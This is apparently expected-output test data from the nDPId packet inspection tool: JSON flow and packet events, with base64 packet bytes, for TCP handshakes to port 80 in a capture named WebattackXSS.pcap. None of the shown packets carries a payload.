+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":660,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1499347042150,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347042150,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzwwb3aSHdt2b96AScSCFcgAAAgQFtAQCCAoD4wIbATkwpAEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":661,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1499347042150,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347042150,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0q1NAAD4GGoWsEAABwKgKMs8MAFB23Zv3G92kiIAQAOUkegAAAQEICgE5MKQD4wIb"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":668,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347043416,"flow_last_seen":1499347043416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347043416,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53018,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":668,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1499347043416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347043416,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8okxAAD4GI4SsEAABwKgKMs8aAFDJVZOtAAAAAKACchD\/ewAAAgQFtAQCCAoBOTHhAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":669,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1499347043417,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347043417,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzxosqk4zyVWTrqAScSB+QwAAAgQFtAQCCAoD4wNXATkx4QEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":670,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1499347043417,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347043417,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ok1AAD4GI4usEAABwKgKMs8aAFDJVZOuLKpONIAQAOUdSwAAAQEICgE5MeED4wNX"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":683,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347044676,"flow_last_seen":1499347044676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347044676,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53032,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1499347044676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347044676,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QP5AAD4GhNKsEAABwKgKMs8oAFCcEnPlAAAAAKACchBLPwAAAgQFtAQCCAoBOTMbAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":684,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1499347044676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347044676,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzyh2l2DwnBJz5qAScSBsIQAAAgQFtAQCCAoD4wSSATkzGwEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":685,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1499347044677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347044677,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QP9AAD4GhNmsEAABwKgKMs8oAFCcEnPmdpdg8YAQAOULKAAAAQEICgE5MxwD4wSS"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":698,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347047249,"flow_last_seen":1499347047249,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347047249,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53058,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":698,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1499347047249,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347047249,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rOxAAD4GGOSsEAABwKgKMs9CAFBNBJlzAAAAAKACchByIQAAAgQFtAQCCAoBOTWfAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":699,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1499347047249,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347047249,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz0I8cGwCTQSZdKAScSC\/lQAAAgQFtAQCCAoD4wcVATk1nwEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":700,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1499347047250,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347047250,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rO1AAD4GGOusEAABwKgKMs9CAFBNBJl0PHBsA4AQAOVenQAAAQEICgE5NZ8D4wcV"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347048548,"flow_last_seen":1499347048548,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347048548,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53072,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1499347048548,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347048548,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rW1AAD4GGGOsEAABwKgKMs9QAFDoOZuOAAAAAKACchDTfgAAAgQFtAQCCAoBOTbjAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":711,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1499347048548,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347048548,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz1DxNtWr6Dmbj6AScSABPgAAAgQFtAQCCAoD4whaATk24wEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":712,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1499347048549,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347048549,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rW5AAD4GGGqsEAABwKgKMs9QAFDoOZuP8TbVrIAQAOWgRAAAAQEICgE5NuQD4wha"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":731,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347051144,"flow_last_seen":1499347051144,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347051144,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53098,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":731,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1499347051144,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347051144,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82StAAD4G7KSsEAABwKgKMs9qAFDGDOBHAAAAAKACchCuTwAAAgQFtAQCCAoBOTlsAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1499347051144,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347051144,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz2oBc4vXxgzgSKAScSATHgAAAgQFtAQCCAoD4wrjATk5bAEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":733,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1499347051145,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347051145,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02SxAAD4G7KusEAABwKgKMs9qAFDGDOBIAXOL2IAQAOWyJAAAAQEICgE5OW0D4wrj"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":740,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347052434,"flow_last_seen":1499347052434,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347052434,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53112,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1499347052434,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347052434,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8athAAD4GWvisEAABwKgKMs94AFBfSFB3AAAAAKACchCjkwAAAgQFtAQCCAoBOTqvAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":741,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1499347052435,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347052435,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz3hoydAQX0hQeKAScSBbjwAAAgQFtAQCCAoD4wwmATk6rwEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":742,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1499347052435,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347052435,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0atlAAD4GWv+sEAABwKgKMs94AFBfSFB4aMnQEYAQAOX6lgAAAQEICgE5Oq8D4wwm"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":755,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347053735,"flow_last_seen":1499347053735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347053735,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53126,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1499347053735,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347053735,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TcZAAD4GeAqsEAABwKgKMs+GAFAPQXYyAAAAAKACchDMjAAAAgQFtAQCCAoBOTv0AAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":756,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1499347053736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347053736,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz4b8rqheD0F2M6AScSAXEAAAAgQFtAQCCAoD4w1rATk79AEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":757,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1499347053736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347053736,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TcdAAD4GeBGsEAABwKgKMs+GAFAPQXYz\/K6oX4AQAOW2FgAAAQEICgE5O\/UD4w1r"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347056332,"flow_last_seen":1499347056332,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347056332,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1499347056332,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347056332,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GMxAAD4GrQSsEAABwKgKMs+gAFAIRCayAAAAAKACchAgZgAAAgQFtAQCCAoBOT5+AAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":771,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1499347056333,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347056333,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz6DSyc0OCEQms6AScSBtlQAAAgQFtAQCCAoD4w\/0ATk+fgEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":772,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1499347056333,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347056333,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0GM1AAD4GrQusEAABwKgKMs+gAFAIRCaz0snND4AQAOUMnQAAAQEICgE5Pn4D4w\/0"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":785,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347057628,"flow_last_seen":1499347057628,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347057628,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53166,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":785,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1499347057628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347057628,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8yDFAAD4G\/Z6sEAABwKgKMs+uAFAuuffwAAAAAKACchAnYQAAAgQFtAQCCAoBOT\/BAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1499347057628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347057628,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz662huYkLrn38aAScSB2eQAAAgQFtAQCCAoD4xE4ATk\/wQEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":787,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1499347057628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347057628,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0yDJAAD4G\/aWsEAABwKgKMs+uAFAuuffxtobmJYAQAOUVgAAAAQEICgE5P8ID4xE4"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347060176,"flow_last_seen":1499347060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347060176,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53192,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1499347060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347060176,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TeFAAD4Gd++sEAABwKgKMs\/IAFAgqg\/fAAAAAKACchAa6wAAAgQFtAQCCAoBOUI+AAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":804,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1499347060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347060176,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz8g7I8+hIKoP4KAScSD5bAAAAgQFtAQCCAoD4xO1ATlCPgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":805,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1499347060177,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347060177,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TeJAAD4Gd\/asEAABwKgKMs\/IAFAgqg\/gOyPPooAQAOWYcwAAAQEICgE5Qj8D4xO1"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347061452,"flow_last_seen":1499347061452,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347061452,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1499347061452,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347061452,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89\/VAAD4GzdqsEAABwKgKMs\/WAFCNxbSIAAAAAKACchAH2QAAAgQFtAQCCAoBOUN9AAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":813,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1499347061452,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347061452,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz9aoZTRrjcW0iaAScSATEAAAAgQFtAQCCAoD4xT0ATlDfQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":814,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1499347061452,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347061452,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09\/ZAAD4GzeGsEAABwKgKMs\/WAFCNxbSJqGU0bIAQAOWyFgAAAQEICgE5Q34D4xT0"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":824,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347062740,"flow_last_seen":1499347062740,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347062740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":824,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1499347062740,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347062740,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/9NAAD4GxfysEAABwKgKMs\/kAFBs1rtsAAAAAKACchAglAAAAgQFtAQCCAoBOUS\/AAAAAAEDAwc="} 